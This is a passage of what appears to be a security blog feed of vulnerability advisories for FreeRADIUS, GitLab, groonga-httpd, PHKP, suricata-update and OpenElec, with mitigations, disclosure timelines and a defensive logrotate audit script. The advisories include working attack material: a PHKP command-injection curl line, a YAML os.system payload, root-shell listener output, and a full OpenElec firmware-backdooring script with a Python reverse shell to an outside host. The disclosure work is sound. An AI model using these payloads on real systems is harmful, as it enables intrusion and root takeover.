<span style="color: #660033;">-nvlp</span> <span style="color: #000000;">3333</span> listening on <span style="color: #7a0874; font-weight: bold;">&#91;</span>any<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #000000;">3333</span> ... 
connect to <span style="color: #7a0874; font-weight: bold;">&#91;</span>127.0.0.1<span style="color: #7a0874; font-weight: bold;">&#93;</span> from <span style="color: #7a0874; font-weight: bold;">&#40;</span>UNKNOWN<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span>127.0.0.1<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #000000;">55526</span> <span style="color: #c20cb9; font-weight: bold;">id</span> <span style="color: #007800;">uid</span>=<span style="color: #000000;">0</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>root<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #007800;">gid</span>=<span style="color: #000000;">0</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>root<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #007800;">groups</span>=<span style="color: #000000;">0</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>root<span style="color: #7a0874; font-weight: bold;">&#41;</span></pre></div></p> <h4>Vulnerable Versions</h4> <p>All versions including 3.0.19</p> <h4>Tested Versions</h4> <p>Name : freeradius<br /> Architecture: x86_64<br /> Version: 3.0.13<br /> Release: 9.el7_5</p> <h4>Impact</h4> <p>An attacker who already achieved a valid shell as user “radiusd” could elevate the privileges to “root”. 
The fact that another exploit is needed to get a shell lowers the severity from high to low.</p> <h4>Mitigation</h4> <p>Add “su radiusd:radiusd” to all log sections in /etc/logrotate.d/radiusd.<br /> By keeping SELinux in "Enforcing" mode, the “radiusd” user is limited in the directories it can write to.</p> <h4>References:</h4> <ul> <li><a href="https://access.redhat.com/security/cve/cve-2019-10143">https://access.redhat.com/security/cve/cve-2019-10143</a></li> <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-10143">https://nvd.nist.gov/vuln/detail/CVE-2019-10143</a></li> </ul> <h4>Vendor Contact Timeline</h4> <p>2019-05-01: Contacting Red Hat</p> <p>2019-05-07: Red Hat opens an issue in the vendor's bug tracker</p> <p>2019-05-23: CVE gets assigned to the issue</p> <p>2019-05-24: FreeRADIUS is skeptical about the “security” impact</p> <p>2019-11-05: Public disclosure</p> <h4>Notes</h4> <p>This CVE is disputed because the vendor <a href="https://freeradius.org/security/">stated</a> that there is no known remote code execution in freeradius that allows an attacker to gain a shell as user “radiusd”. CVEs are not only assigned for vulnerabilities but also for exposures that allow an attacker to have a stronger impact after a successful attack. 
Therefore we believe that it is important to file this issue as a security-related bug.</p> <h4>Advisory URL</h4> <p><a href="https://www.ait.ac.at/ait-sa-20191112-01-privilege-escalation-via-logrotate-in-freeradius">https://www.ait.ac.at/ait-sa-20191112-01-privilege-escalation-via-logrotate-in-freeradius</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 02 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> </div> </div> Mon, 02 Dec 2019 18:11:22 +0000 Hoti 283 at https://tech.feedyourhead.at CVE-2019-15741: Privilege Escalation via Logrotate in Gitlab Omnibus 
https://tech.feedyourhead.at/content/Privilege-Escalation-via-Logrotate-in-Gitlab-Omnibus-CVE-2019-15741 <span class="field field--name-title field--type-string field--label-hidden">CVE-2019-15741: Privilege Escalation via Logrotate in Gitlab Omnibus</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul><li>Identifier: AIT-SA-20190930-01</li> <li>Target: GitLab Omnibus</li> <li>Vendor: GitLab</li> <li>Version: 7.4 through 12.2.1</li> <li>Fixed in Version: 12.2.3, 12.1.8 and 12.0.8</li> <li>CVE: CVE-2019-15741</li> <li>Accessibility: Local</li> <li>Severity: Low</li> <li>Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</li> </ul><h3>Vulnerability Description</h3> <p>GitLab Omnibus sets the ownership of the log directory to the system-user "git", which might let local users obtain root access because of unsafe interaction with logrotate.</p> <h3>Vulnerable Versions</h3> <p>7.4 through 12.2.1</p> <h3>Impact</h3> <p>An attacker who already achieved a valid shell as user “git” could elevate the privileges to “root”. 
The fact that another exploit is needed to get a shell lowers the severity from high to low.</p> <h3>Advisory URL</h3> <p><a href="http://www.ait.ac.at/ait-sa-20190930-01-privilege-escalation-via-logrotate-in-gitlab-omnibus">http://www.ait.ac.at/ait-sa-20190930-01-privilege-escalation-via-logrotate-in-gitlab-omnibus</a></p> <h3>References:</h3> <ul><li><a href="https://about.gitlab.com/2019/08/29/security-release-gitlab-12-dot-2-dot-3-released/">https://about.gitlab.com/2019/08/29/security-release-gitlab-12-dot-2-dot-3-released/</a></li> <li><a href="https://gitlab.com/gitlab-org/omnibus-gitlab/issues/4380">https://gitlab.com/gitlab-org/omnibus-gitlab/issues/4380</a></li> <li><a href="https://hackerone.com/reports/578119">https://hackerone.com/reports/578119</a></li> </ul></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Oct 04 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/git" hreflang="en">git</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> </div> </div> Fri, 04 Oct 2019 11:25:05 +0000 Hoti 279 at https://tech.feedyourhead.at Privilege escalation in groonga-httpd (CVE-2019-11675) https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd <span class="field field--name-title field--type-string field--label-hidden">Privilege escalation in groonga-httpd (CVE-2019-11675)</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul> <li>System affected: Debian packages of groonga/-httpd 6.1.5-1</li> <li>Software-Version: 6.1.5-1</li> <li>User-Interaction: Not required</li> <li>Impact: Local root</li> <li>CVE: CVE-2019-11675</li> </ul> <h3>Detailed Description</h3> <p>The path of the log directory of groonga-httpd can be manipulated by user groonga:</p> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">ls -l /var/log/groonga
total 8
-rw-r--r-- 1 root root 1296 Apr 25 18:44 groonga.log
drwxr-xr-x 2 groonga groonga 4096 Apr 25 18:55 httpd</pre></div> <p>The files in /var/log/groonga/httpd/*.log are rotated once a day by logrotate, running as user root, with the following config:</p> <pre>
/var/log/groonga/httpd/*.log {
    daily
    missingok
    rotate 30
    compress
    delaycompress
    notifempty
    create 640 groonga groonga
    sharedscripts
    postrotate
        . /etc/default/groonga-httpd
        if [ x"$ENABLE" = x"yes" ]; then
            /usr/bin/curl --silent --output /dev/null \
                "http://127.0.0.1:10041/d/log_reopen"
        fi
    endscript
}
</pre> <p>Because <a href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">logrotate is prone to a race condition</a>, it is possible for user "groonga" to replace the directory /var/log/groonga/httpd with a symbolic link to any directory (for example /etc/bash_completion.d). logrotate will then place files AS ROOT into /etc/bash_completion.d and set their owner and group to "groonga.groonga". An attacker could simply place a reverse shell into this file. 
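An added audit for the condition described here and in the freeradius mitigation above; it is written for this page and is not part of the advisory, of logrotten or of logrotate. It parses a logrotate stanza such as the groonga-httpd one, takes directory ownership from a constructed mapping in place of a live os.stat(), and flags stanzas in which root would rotate inside a directory owned by a non-root account without a valid su directive. The function names parse_logrotate and unsafe_stanzas are this example's own; logrotate's su directive takes the user and the group as two separate words (`su user group`), and the audit reports any other spelling as malformed.

```python
import shlex
from dataclasses import dataclass, field
from pathlib import PurePosixPath


@dataclass
class Stanza:
    patterns: list                                   # glob(s) before the brace
    directives: dict = field(default_factory=dict)  # keyword -> argument list
    scripts: dict = field(default_factory=dict)     # postrotate/... -> lines


def parse_logrotate(text):
    """Parse the subset of logrotate syntax used by the distro configs above."""
    stanzas, pending, current, script = [], [], None, None
    for raw in text.splitlines():
        if script is not None:                # inside postrotate ... endscript
            line = raw.strip()
            if line == "endscript":
                script = None
            elif line:
                current.scripts[script].append(line)
            continue
        line = raw.split("#", 1)[0].strip()  # comments only outside scripts
        if not line:
            continue
        if line.endswith("{"):                # patterns may share the brace line
            current = Stanza(patterns=pending + shlex.split(line[:-1]))
            pending = []
        elif line == "}":
            stanzas.append(current)
            current = None
        elif current is None:                 # pattern lines before the brace
            pending += shlex.split(line)
        else:
            word, *args = line.split()
            if word in ("prerotate", "postrotate", "firstaction", "lastaction"):
                script, current.scripts[word] = word, []
            else:
                current.directives[word] = args
    return stanzas


def unsafe_stanzas(stanzas, owners):
    """Report stanzas where root would rotate inside a directory that a
    non-root account controls and no valid `su user group` directive applies.

    `owners` maps a directory to (user, group, mode) and stands in for an
    os.stat() of the live host so the check runs on constructed input; a
    missing entry counts as root-owned 0755.  logrotate itself only refuses
    group- or world-writable parents: a parent *owned* by the service user,
    the case in the advisories above, passes that check, hence this audit."""
    findings = []
    for st in stanzas:
        su = st.directives.get("su")
        if su is not None and len(su) == 2:
            continue  # logrotate switches to that user/group before rotating
        if su is not None:
            findings.append((st.patterns[0], "malformed su, expected `su user group`"))
        for pat in st.patterns:
            d = str(PurePosixPath(pat).parent)
            user, group, mode = owners.get(d, ("root", "root", 0o755))
            if user != "root":
                findings.append((pat, f"{d} owned by non-root user {user}"))
            elif mode & 0o002:
                findings.append((pat, f"{d} is world-writable"))
            elif group != "root" and mode & 0o020:
                findings.append((pat, f"{d} is writable by group {group}"))
    return findings


# Constructed input: the groonga-httpd stanza quoted in the advisory above.
GROONGA_CONF = """\
/var/log/groonga/httpd/*.log {
    daily
    missingok
    rotate 30
    compress
    delaycompress
    notifempty
    create 640 groonga groonga
    sharedscripts
    postrotate
        . /etc/default/groonga-httpd
        if [ x"$ENABLE" = x"yes" ]; then
            /usr/bin/curl --silent --output /dev/null \\
                "http://127.0.0.1:10041/d/log_reopen"
        fi
    endscript
}
"""
# The advisory's mitigation: a su directive, user and group as two words.
HARDENED_CONF = GROONGA_CONF.replace("{\n", "{\n    su groonga groonga\n", 1)
# Constructed ownership matching the `ls -l /var/log/groonga` listing above.
OWNERS = {"/var/log/groonga/httpd": ("groonga", "groonga", 0o755)}

if __name__ == "__main__":
    for label, conf in (("as shipped", GROONGA_CONF), ("with su", HARDENED_CONF)):
        print(label, unsafe_stanzas(parse_logrotate(conf), OWNERS) or "OK")
```

Changing the directory owner to root, the advisory's other mitigation, also clears the finding, which the audit shows when the ownership map is adjusted accordingly.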
As soon as root logs in, the reverse shell is executed.</p> <h3>Exploit</h3> <p>A proof-of-concept exploit can be found at <a href="https://github.com/whotwagner/logrotten">https://github.com/whotwagner/logrotten</a></p> <h3>Mitigation</h3> <p>The problem can be mitigated by changing the owner and group of /var/log/groonga to root, or by using the "su" option inside the logrotate config file.</p> <h3>Credits</h3> <p>This bug was discovered by Wolfgang Hotwagner (https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd)</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 07 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/debian" hreflang="en">Debian</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> </div> </div> Tue, 07 May 2019 20:32:56 +0000 Hoti 278 at https://tech.feedyourhead.at Full Disclosure: Remote-Command-Execution in PHKP https://tech.feedyourhead.at/content/full-disclosure-remote-command-execution-in-phkp <span class="field field--name-title field--type-string field--label-hidden">Full Disclosure: Remote-Command-Execution in PHKP</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul><li>System affected: <a href="https://el-tramo.be/phkp/">PHKP</a></li> <li>Software-Version: up to and including commit 88fd9cfdf14ea4b6ac3e3967feea7bcaabb6f03b</li> <li>User-Interaction: Not required</li> <li>Impact: Remote-Code-Execution</li> <li>CVE: CVE-2018-1000885</li> </ul><h3>Detailed Description</h3> <p>According to the project page, "PHKP is an implementation of the <a href="https://tools.ietf.org/html/draft-shaw-openpgp-hkp-00">OpenPGP HTTP Keyserver Protocol (HKP)</a> in PHP". 
Because the query parameters of the <a href="https://tools.ietf.org/html/draft-shaw-openpgp-hkp-00#page-3">/pks/lookup call</a> are not sanitized, arbitrary shell commands can be injected and executed remotely.</p> <p>In <a href="https://github.com/remko/phkp/blob/88fd9cfdf14ea4b6ac3e3967feea7bcaabb6f03b/phkp.php#L106-L107">line 106 of phkp.php</a> the search parameter of the "/pks/lookup&amp;op=index" call is assigned without any checks, and in line 107 this variable is used as a parameter of exec():</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;">$search = $vars['search'];
$pgp_result = pgp_exec("--list-public-keys --list-keys $search", $output);</pre></div> <p>It is possible to inject arbitrary shell commands through the search parameter:</p> <p><span class="geshifilter"><code class="bash geshifilter-bash">curl http://localhost:8008/pks/lookup?op=index&amp;search=js@example.com; id</code></span></p> <p>In lines <a href="https://github.com/remko/phkp/blob/88fd9cfdf14ea4b6ac3e3967feea7bcaabb6f03b/phkp.php#L116-L117">116 and 117</a> the same problem occurs again for the "/pks/lookup&amp;op=get" call. That means that the remote code execution occurs in two places.</p> <h3>Proof-Of-Concept</h3> <p>An ordinary lookup could look like the following:</p> <p><img alt="Normal phkp-lookup" data-entity-type="file" data-entity-uuid="83e75e46-8ca9-4cfe-a717-ca2535521734" src="/sites/default/files/inline-images/2018-10-08-13%3A14%3A35.png" /></p> <p>By injecting shell commands into the search parameter, it is possible to execute any command:</p> <p><img alt="phkp rce" data-entity-type="file" data-entity-uuid="ba2c925d-adac-4faf-a1bb-d5477140702e" src="/sites/default/files/inline-images/phkp-rce.png" /></p> <h3>Mitigation</h3> <p>Currently there is no fix for this bug. The <a href="https://github.com/remko/phkp/issues/1">author was informed on Jul 18 2018</a>. A solution for this problem might be the <a href="http://php.net/manual/en/function.escapeshellcmd.php">escapeshellcmd() function</a>.</p> <h3>Credits</h3> <p>The remote code execution bug was discovered by Wolfgang Hotwagner (https://tech.feedyourhead.at/content/full-disclosure-remote-command-execution-in-phkp)</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Oct 08 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> </div> </div> Mon, 08 Oct 2018 11:23:39 +0000 Hoti 270 at https://tech.feedyourhead.at Remote-Code-Execution in Suricata-Update https://tech.feedyourhead.at/content/remote-code-execution-in-suricata-update <span class="field field--name-title field--type-string field--label-hidden">Remote-Code-Execution in Suricata-Update</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul> <li>System affected: <a href="https://github.com/OISF/suricata-update">Suricata-Update</a></li> <li>CVE: <a href="https://www.cvedetails.com/cve/CVE-2018-1000167/" title="CVE-2018-1000167 security vulnerability details">CVE-2018-1000167</a></li> <li>Software-Version: 1.0.0a1</li> <li>User-Interaction: Not required</li> <li>Impact: Remote-Code-Execution</li> </ul> <h3>Detailed Description</h3> <p>The list of possible sources for suricata-update is downloaded from "<a href="https://www.openinfosecfoundation.org/rules/index.yaml">https://www.openinfosecfoundation.org/rules/index.yaml</a>" by default. 
Suricata-Update uses the insecure yaml.load() function, which can lead to remote code execution.</p> <h3>Proof-Of-Concept</h3> <p>Code will be executed if the yaml file at <a href="https://openinfosecfoundation.org/rules/index.yaml">https://openinfosecfoundation.org/rules/index.yaml</a> contains the following line:</p> <pre><code>hello: !!python/object/apply:os.system ['ls -l &gt; /tmp/output']</code></pre> <p>The vulnerable function can be triggered by "suricata-update list-sources". The locally stored index.yaml is loaded in this function and the malicious code gets executed.</p> <h3>Solution</h3> <p>The provided fix was released in version <a href="https://github.com/OISF/suricata-update/releases/tag/1.0.0b1">1.0.0b1</a>.</p> <h3>Credits</h3> <p>The remote code execution bug was discovered and fixed by Wolfgang Hotwagner (https://tech.feedyourhead.at/content/remote-code-execution-in-suricata-update)</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Apr 06 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/104" hreflang="en">Suricata</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> </div> </div> Fri, 06 Apr 2018 10:39:06 +0000 Hoti 252 at https://tech.feedyourhead.at OpenElec: Remote Code Execution Vulnerability through Man-In-The-Middle (CVE-2017-6445) https://tech.feedyourhead.at/content/openelec-remote-code-execution-vulnerability-through-man-in-the-middle <span class="field field--name-title field--type-string field--label-hidden">OpenElec: Remote Code Execution Vulnerability through Man-In-The-Middle (CVE-2017-6445)</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>During my research about update mechanisms of open-source software, I discovered vulnerabilities in OpenElec.</p> <h3>Overview</h3> <ul><li>System affected: OpenElec</li> <li>CVE: CVE-2017-6445</li> <li>Vulnerable component: auto-update feature</li> <li>Software-Version: 6.0.3, 7.0.1</li> <li>User-Interaction: Reboot required</li> <li>Impact: Remote Code Execution with root permission</li> </ul><h3>Product Description</h3> <p>According to its <a href="http://openelec.tv/">website</a>, "<strong>Open Embedded Linux Entertainment Center (OpenELEC)</strong> is a small Linux based <a href="http://en.wikipedia.org/wiki/Just_enough_operating_system" target="_blank">Just Enough Operating System (JeOS)</a> built from scratch as a platform to turn your computer into a <a href="http://kodi.tv">Kodi</a> media center."</p> <h3>Vulnerability</h3> <p>Automatic updates are disabled by default. After enabling them, OpenElec connects to http://update.openelec.tv/updates.php to check whether a newer version is available. 
If there is a newer version, OpenElec downloads it from http://releases.openelec.tv/&lt;version&gt;.tar (or any other URL returned by update.openelec.tv).</p> <p><img alt="openelec-update-schema" data-entity-type="file" data-entity-uuid="15f13d18-13cc-4322-928a-47b63d91e0f6" src="/sites/default/files/inline-images/OpenElec-Update-Schema.png" /></p> <p>The auto-update feature of OpenElec uses neither encrypted connections nor signed updates. A man-in-the-middle could manipulate the update packages to gain root access remotely.</p> <p><img alt="openelec-attac" data-entity-type="file" data-entity-uuid="d6818f0c-10bc-400b-b904-46233d12df90" src="/sites/default/files/inline-images/OpenElec-Angriff-Schema_0.png" /></p> <p>In order to run the downloaded firmware, the OpenElec system has to be rebooted, so at this point user interaction is required.</p> <h3>Exploit</h3> <p>The following code downloads an OpenElec firmware, extracts it, places a reverse shell into the Kodi start script and finally generates a backdoored firmware:</p> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;"><span style="color: #666666; font-style: italic;">#!/bin/bash</span>   <span style="color: #007800;">OPENELEC</span>=<span style="color: #ff0000;">"OpenELEC-RPi2.arm-7.0.1"</span> <span style="color: #007800;">DOWNLOADURL</span>=<span style="color: #ff0000;">"http://releases.openelec.tv/"</span>   <span style="color: #007800;">TMP</span>=<span style="color: #ff0000;">"/tmp"</span>   <span style="color: #7a0874; font-weight: bold;">cd</span> <span style="color: #007800;">$TMP</span> <span style="color: #7a0874; font-weight: bold;">test</span> <span style="color: #660033;">-e</span> <span style="color: #800000;">${OPENELEC}</span>.tar <span style="color: #000000; font-weight: bold;">||</span> <span style="color: #c20cb9; font-weight: bold;">wget</span> <span style="color: #007800;">$DOWNLOADURL</span><span style="color: #000000; 
font-weight: bold;">/</span><span style="color: #800000;">${OPENELEC}</span>.tar <span style="color: #7a0874; font-weight: bold;">test</span> <span style="color: #660033;">-d</span> <span style="color: #007800;">$OPENELEC</span> <span style="color: #000000; font-weight: bold;">||</span> <span style="color: #c20cb9; font-weight: bold;">tar</span> xvf <span style="color: #800000;">${OPENELEC}</span>.tar   <span style="color: #7a0874; font-weight: bold;">test</span> <span style="color: #660033;">-d</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked <span style="color: #000000; font-weight: bold;">||</span> <span style="color: #c20cb9; font-weight: bold;">mkdir</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked <span style="color: #7a0874; font-weight: bold;">cd</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked <span style="color: #7a0874; font-weight: bold;">test</span> <span style="color: #660033;">-d</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root <span style="color: #000000; font-weight: bold;">||</span> unsquashfs <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #007800;">$OPENELEC</span><span style="color: #000000; font-weight: bold;">/</span>target<span style="color: #000000; font-weight: bold;">/</span>SYSTEM   <span style="color: #c20cb9; font-weight: bold;">cat</span> <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root<span style="color: #000000; font-weight: bold;">/</span>usr<span 
style="color: #000000; font-weight: bold;">/</span>bin<span style="color: #000000; font-weight: bold;">/</span>revshell.sh <span style="color: #cc0000; font-style: italic;">&lt;&lt; EOF #!/bin/bash   while true do python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.12.32.15",5000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' &gt; /dev/null 2&gt;&amp;1 done EOF</span>   <span style="color: #c20cb9; font-weight: bold;">chmod</span> <span style="color: #000000;">777</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>bin<span style="color: #000000; font-weight: bold;">/</span>revshell.sh   <span style="color: #c20cb9; font-weight: bold;">awk</span> <span style="color: #ff0000;">'/trap cleanup TERM/ { print; print "/usr/bin/revshell.sh &amp;"; next }1'</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>lib<span style="color: #000000; font-weight: bold;">/</span>kodi<span style="color: #000000; font-weight: bold;">/</span>kodi.sh <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>lib<span style="color: #000000; font-weight: bold;">/</span>kodi<span style="color: #000000; 
font-weight: bold;">/</span>kodievil.sh <span style="color: #c20cb9; font-weight: bold;">mv</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>lib<span style="color: #000000; font-weight: bold;">/</span>kodi<span style="color: #000000; font-weight: bold;">/</span>kodievil.sh <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>lib<span style="color: #000000; font-weight: bold;">/</span>kodi<span style="color: #000000; font-weight: bold;">/</span>kodi.sh <span style="color: #c20cb9; font-weight: bold;">chmod</span> <span style="color: #000000;">777</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>lib<span style="color: #000000; font-weight: bold;">/</span>kodi<span style="color: #000000; font-weight: bold;">/</span>kodi.sh   mksquashfs squashfs-root<span style="color: #000000; font-weight: bold;">/</span> SYS <span style="color: #660033;">-noappend</span> <span style="color: #660033;">-comp</span> <span style="color: #c20cb9; font-weight: bold;">gzip</span>   <span style="color: #c20cb9; font-weight: bold;">mv</span> SYS <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #007800;">$OPENELEC</span><span style="color: #000000; font-weight: bold;">/</span>target<span 
style="color: #000000; font-weight: bold;">/</span>SYSTEM <span style="color: #7a0874; font-weight: bold;">cd</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #007800;">$OPENELEC</span> md5sum target<span style="color: #000000; font-weight: bold;">/</span>SYSTEM <span style="color: #000000; font-weight: bold;">&gt;</span> target<span style="color: #000000; font-weight: bold;">/</span>SYSTEM.md5 <span style="color: #7a0874; font-weight: bold;">cd</span> <span style="color: #007800;">$TMP</span> <span style="color: #c20cb9; font-weight: bold;">tar</span> cvf <span style="color: #007800;">$OPENELEC</span>.evil.tar <span style="color: #007800;">$OPENELEC</span>     <span style="color: #7a0874; font-weight: bold;">test</span> <span style="color: #660033;">-d</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked <span style="color: #000000; font-weight: bold;">&amp;&amp;</span> <span style="color: #c20cb9; font-weight: bold;">rm</span> <span style="color: #660033;">-fr</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked <span style="color: #7a0874; font-weight: bold;">test</span> <span style="color: #660033;">-d</span> <span style="color: #007800;">$OPENELEC</span> <span style="color: #000000; font-weight: bold;">&amp;&amp;</span> <span style="color: #c20cb9; font-weight: bold;">rm</span> <span style="color: #660033;">-rf</span> <span style="color: #007800;">$OPENELEC</span></pre></div> <h3>Mitigation</h3> <p>Ensure that auto-update is disabled.</p> <h3>Timeline</h3> <ul><li>This bug was reported on December 03 2016.</li> <li>Published as Zero-Day after no reply from OpenElec on March 04 2017</li> </ul><h3>Credits</h3> <p>CVE-2017-6445 was discovered by Wolfgang Hotwagner (<a 
